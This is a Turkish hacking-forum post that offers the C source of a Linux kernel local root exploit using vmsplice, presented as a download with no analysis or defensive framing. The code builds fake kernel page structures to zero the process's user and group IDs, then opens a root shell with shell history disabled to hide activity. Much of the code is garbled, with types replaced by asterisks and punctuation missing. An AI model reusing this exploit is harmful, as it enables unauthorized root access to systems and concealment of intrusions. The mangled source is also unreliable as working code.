Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Linux Kernel 2.6.18-6 x86 Local Root Exploit
#1
PHP Kod:
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
**** *
mapping;
unsigned long index;
struct long nextprev; } lru;
};

**** 
exit_code();
char exit_stack[1024 1024];

**** die(
char *msgint err)
{
printf(err "[-] %s: %s\n" "[-] %s\n"msgstrerror(err));
fflush(stdout);
fflush(stderr);
exit(
1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
**** exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
**** * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
"=r" (curr)
"i" (~8191)
);
return (**** *) 
curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
**** exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
**** * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
"=r" (curr)
);
return (**** *) 
curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long_vmsplice,
intfd,
struct iovec *, iov,
unsigned longnr_segs,
unsigned intflags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uidgid;

**** 
kernel_code()
{
int i;
uint *get_current();

for (
01024-13i++) {
if (
p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
= (uint *) ((char *)(8) + sizeof(**** *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;


exit_kernel();
}

**** 
exit_code()
{
if (
getuid() != 0)
die(
"wtf"0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash""bash""-i"NULL);
die(
"/bin/bash"errno);
}

int main(int argcchar *argv[])
{
int pi[2];
size_t map_size;
char map_addr;
struct iovec iov;
struct page pages[5];

uid getuid();
gid getgid();
setresuid(uiduiduid);
setresgid(gidgidgid);

if (!
uid || !gid)
die(
"!@#$"0);

/*****/
pages[1] = pages[0] + 1;

map_addr mmap(pages[0], map_sizePROT_READ PROT_WRITE,
MAP_FIXED MAP_PRIVATE MAP_ANONYMOUS, -10);
if (
map_addr == MAP_FAILED)
die(
"mmap"errno);

memset(map_addr0map_size);
printf("[+] mmap: ***%lx .. ***%lx\n"map_addrmap_addr map_size);
printf("[+] page: ***%lx\n"pages[0]);
printf("[+] page: ***%lx\n"pages[1]);

pages[0]->flags << PG_compound;
pages[0]->private = (unsigned longpages[0];
pages[0]->count 1;
pages[1]->lru.next = (longkernel_code;

/*****/
pages[2] = *(**** **) pages[0];
pages[3] = pages[2] + 1;

map_addr mmap(pages[2], map_sizePROT_READ PROT_WRITE,
MAP_FIXED MAP_PRIVATE MAP_ANONYMOUS, -10);
if (
map_addr == MAP_FAILED)
die(
"mmap"errno);

memset(map_addr0map_size);
printf("[+] mmap: ***%lx .. ***%lx\n"map_addrmap_addr map_size);
printf("[+] page: ***%lx\n"pages[2]);
printf("[+] page: ***%lx\n"pages[3]);

pages[2]->flags << PG_compound;
pages[2]->private = (unsigned longpages[2];
pages[2]->count 1;
pages[3]->lru.next = (longkernel_code;

/*****/
map_addr mmap(pages[4], map_sizePROT_READ PROT_WRITE,
MAP_FIXED MAP_PRIVATE MAP_ANONYMOUS, -10);
if (
map_addr == MAP_FAILED)
die(
"mmap"errno);
memset(map_addr0map_size);
printf("[+] mmap: ***%lx .. ***%lx\n"map_addrmap_addr map_size);
printf("[+] page: ***%lx\n"pages[4]);

/*****/
map_addr mmap(NULLmap_sizePROT_READ PROT_WRITE,
MAP_PRIVATE MAP_ANONYMOUS, -10);
if (
map_addr == MAP_FAILED)
die(
"mmap"errno);

memset(map_addr0map_size);
printf("[+] mmap: ***%lx .. ***%lx\n"map_addrmap_addr map_size);

/*****/
if (pipe(pi) < 0) die("pipe"errno);
close(pi[0]);

iov.iov_base map_addr;
iov.iov_len ULONG_MAX;

signal(SIGPIPEexit_code);
_vmsplice(pi[1], &iov10);
die(
"vmsplice"errno);
return 
0;

Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 5 271 04-12-2016, Saat: 00:31
Son Yorum: DeaTHKNighT33
  Kali Linux Eğitimi - PDF CyberHacker 1 39 03-12-2016, Saat: 16:47
Son Yorum: cemadrian
  Windows Server Root Kısa Videolu Anlatım KingSkrupellos 7 157 21-11-2016, Saat: 13:06
Son Yorum: Gardiyan
  vBulletin 5.1.2 SQL Injection Exploit Mrxxx 0 38 20-11-2016, Saat: 11:36
Son Yorum: Mrxxx
  Linux Server Bypass (Disable Functions) S4DRAZAM 2 312 05-09-2016, Saat: 16:03
Son Yorum: kanunii
Anahtar Kelimeler

Linux Kernel 2.6.18-6 x86 Local Root Exploit indir, Linux Kernel 2.6.18-6 x86 Local Root Exploit Videosu, Linux Kernel 2.6.18-6 x86 Local Root Exploit Online izle, Linux Kernel 2.6.18-6 x86 Local Root Exploit Bedava indir, Linux Kernel 2.6.18-6 x86 Local Root Exploit Yükle, Linux Kernel 2.6.18-6 x86 Local Root Exploit Hakkında, Linux Kernel 2.6.18-6 x86 Local Root Exploit Nedir, Linux Kernel 2.6.18-6 x86 Local Root Exploit Free indir, Linux Kernel 2.6.18-6 x86 Local Root Exploit Oyunu, Linux Kernel 2.6.18-6 x86 Local Root Exploit Download


1 Ziyaretçi